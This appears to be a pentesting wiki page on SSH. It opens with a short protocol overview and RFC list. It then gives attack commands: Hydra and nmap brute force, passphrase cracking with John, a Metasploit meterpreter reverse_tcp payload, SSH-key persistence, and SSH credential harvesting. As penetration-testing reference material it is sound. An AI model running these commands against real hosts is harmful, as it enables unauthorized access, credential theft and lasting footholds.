SSH

The SSH Protocol

SSH (Secure Shell) was developed as a secure alternative to earlier network protocols like FTP, Telnet, and RSH, which facilitated data exchange between machines but lacked security features such as authentication, data integrity, and confidentiality.

Key RFCs Defining SSH:

  • RFC 4250 & RFC 4251 — Define the protocol's architecture and terminology.

  • RFC 4252 — SSH-USERAUTH for client authentication; key-based authentication is recommended.

  • RFC 4253 — SSH-TRANS for server authentication and secure communication channel establishment (ensuring data integrity and confidentiality).

  • RFC 4254 — SSH-CONNECT, which specifies command handling and data multiplexing.

The default SSH port is 22, but port forwarding can be configured.

cd /etc/ssh
nano sshd_config

Use Cases

  • SSH should be used instead of Telnet, RSH, and RLOGIN for remote administration.

  • SCP or SFTP should be used instead of RCP and FTP for file transfers.

  • SSH is also used for port forwarding.

Pentesting SSH

Password Cracking with Hydra

hydra -L users.txt -P pass.txt <IP> ssh -s <PORT>

Passphrase Cracking with John

ssh2john id_rsa > sshhash
john --wordlist=/usr/share/wordlists/rockyou.txt sshhash

Authentication with Metasploit

Password-based Authentication

use exploit/multi/ssh/sshexec
set rhosts <IP>
set payload linux/x86/meterpreter/reverse_tcp
set username <USERNAME>
set password <PASSWORD>
show targets
set target <n>
exploit

Key-based Authentication

use auxiliary/scanner/ssh/ssh_login_pubkey
set rhosts <IP>
set key_path id_rsa
set username <USERNAME>
set key_pass <PASSWORD>
exploit
sessions
sessions -u <n>

Persistence

After establishing a meterpreter shell, you can set up persistence. The key pair created is located at /root/.msf4/loot.

sessions
use post/linux/manage/sshkey_persistence
set session <n>
exploit

cd /root/.msf4/loot
mv <Created Key> key
chmod 600 key
ssh -i key <USER>@<IP>

Gathering Information

use post/multi/gather/ssh_creds
set session <n>
exploit

Nmap Scripts

Basic SSH brute force

nmap --script ssh-brute -p <SSH PORT> <IP>

SSH brute force with custom username and password lists

nmap --script ssh-brute --script-args userdb=usernames.txt,passdb=passwords.txt -p <SSH PORT> <IP>

Identify SSH authentication methods

nmap --script ssh-auth-methods --script-args="ssh.user=pentest" -p <SSH PORT> <IP>

References

PreviousSmbclientNextTunneling

Last updated